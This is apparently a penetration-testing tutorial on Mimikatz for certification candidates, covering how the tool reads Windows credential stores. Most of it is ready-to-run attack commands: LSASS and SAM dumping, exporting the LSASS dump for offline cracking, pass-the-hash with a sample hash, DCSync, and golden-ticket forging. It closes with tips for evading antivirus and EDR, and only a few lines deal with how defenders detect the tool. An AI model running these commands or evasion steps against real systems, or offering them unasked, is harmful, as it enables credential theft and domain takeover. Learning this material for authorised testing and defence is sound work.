Mimikatz, created by Benjamin Delpy, is one of the most well-known post-exploitation tools in the penetration tester’s arsenal. It can extract plaintext passwords, NTLM hashes, Kerberos tickets, and more from Windows memory. Understanding Mimikatz — how it works, how to use it, and how defenders detect it — is essential for anyone preparing for OSCP, CRTP, or real-world red team engagements. This guide covers practical Mimikatz usage in authorized lab environments.
What Mimikatz Does
Mimikatz primarily targets the Local Security Authority Subsystem Service (LSASS) process in Windows, which stores authentication credentials in memory to enable single sign-on. By reading LSASS memory, Mimikatz can extract:
- Plaintext passwords (on Windows 7/2008 and older, or when WDigest is enabled)
- NTLM password hashes
- Kerberos TGTs and TGS tickets
- DPAPI master keys
On modern Windows 10/11 and Server 2019/2022, plaintext passwords are no longer stored by default. However, NTLM hashes and Kerberos tickets remain extractable and are powerful enough for lateral movement.
Getting Mimikatz
Download the latest compiled release from the official GitHub repository: https://github.com/gentilkiwi/mimikatz/releases. The archive contains mimikatz.exe (32-bit) and mimikatz_x64.exe (64-bit). You almost always want the 64-bit version on modern systems.
Be aware that AV/EDR will flag the binary immediately. In lab environments, add an exclusion or use an obfuscated variant (Invoke-Mimikatz from PowerSploit, or custom compiled builds).
Running Mimikatz
Launch mimikatz.exe from an elevated command prompt (you need local admin or SYSTEM privileges):
mimikatz.exe
You’ll land at the mimikatz # prompt. First, request debug privileges:
privilege::debug
You should see Privilege '20' OK. Without this, most commands will fail.
Dumping Credentials from LSASS
sekurlsa::logonpasswords
This is the classic Mimikatz command. It reads LSASS memory and displays every credential cached since the last reboot:
sekurlsa::logonpasswords
Output is organized by logon session and includes:
- Username and domain
- NTLM hash
- SHA1 hash
- Cleartext password (if WDigest is enabled or on older OS)
- Kerberos tickets
sekurlsa::msv
Extracts only NTLM hashes (faster and less noisy than logonpasswords):
sekurlsa::msv
Dumping LSASS to a File (Without Running Mimikatz On-Target)
A common evasion technique is to dump LSASS to a minidump file using built-in Windows tools, exfiltrate the dump, and run Mimikatz offline:
# Using Task Manager: right-click lsass.exe in Details → Create dump file
# Or via PowerShell with ProcDump:
.\procdump.exe -accepteula -ma lsass.exe lsass.dmp
Then on your local machine:
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
This avoids running Mimikatz directly on the target, reducing EDR detection risk.
sekurlsa::tickets
Lists all Kerberos tickets in memory:
sekurlsa::tickets
kerberos::list /export
Exports all tickets to .kirbi files in the current directory:
kerberos::list /export
These tickets can be used with Impacket’s ticketer.py or injected into another session.
kerberos::ptt (Pass-the-Ticket)
Inject a .kirbi ticket into the current session:
kerberos::ptt ticket.kirbi
After injection, you can use the ticket to access resources — for example, connecting to a file share or running psexec against a machine without knowing the password.
Pass-the-Hash
Mimikatz enables pass-the-hash attacks using the sekurlsa::pth command. You can spawn a new process using a captured NTLM hash without knowing the plaintext password:
sekurlsa::pth /user:Administrator /domain:CORP /ntlm:8846f7eaee8fb117ad06bdd830b7586c /run:cmd.exe
A new cmd.exe window opens with the identity of the target account. From there, you can access network resources or use Impacket tools with the impersonated identity.
Golden and Silver Tickets
DCSync mimics a domain controller replication request to pull any account’s hash from Active Directory without logging on to the DC directly:
lsadump::dcsync /domain:corp.local /user:krbtgt
You need Domain Admin or a user with Replicating Directory Changes All rights.
kerberos::golden — Forging a Golden Ticket
With the KRBTGT hash, you can forge a Golden Ticket valid for any user:
kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /krbtgt:<hash> /ticket:golden.kirbi
Then inject it:
kerberos::ptt golden.kirbi
Golden Tickets are persistent — they survive password changes and remain valid for 10 years by default.
SAM Database Dumping
When you have SYSTEM privileges on a local machine, you can extract the SAM database without touching LSASS:
token::elevate
lsadump::sam
Or extract LSA secrets (including cached domain credentials):
lsadump::secrets
Detection and Evasion Notes
Defenders watch for:
- Event ID 4624 (logon) with unusual patterns
- Event ID 10 (LSASS access) in Sysmon logs — the key telltale for Mimikatz
- Credential Guard (blocks LSASS memory reading on modern Windows)
- Protected Users security group membership
To reduce detection in authorized engagements, consider:
- Running Mimikatz from memory (Invoke-Mimikatz)
- Dumping LSASS via comsvcs.dll:
rundll32.exe C:\windows\System32\comsvcs.dll MiniDump <PID> lsass.dmp full
- Using obfuscated loaders or custom compiles
Understanding how Mimikatz works at the API level (OpenProcess, ReadProcessMemory) helps you explain findings to blue teams and demonstrate detection gaps during post-engagement reviews.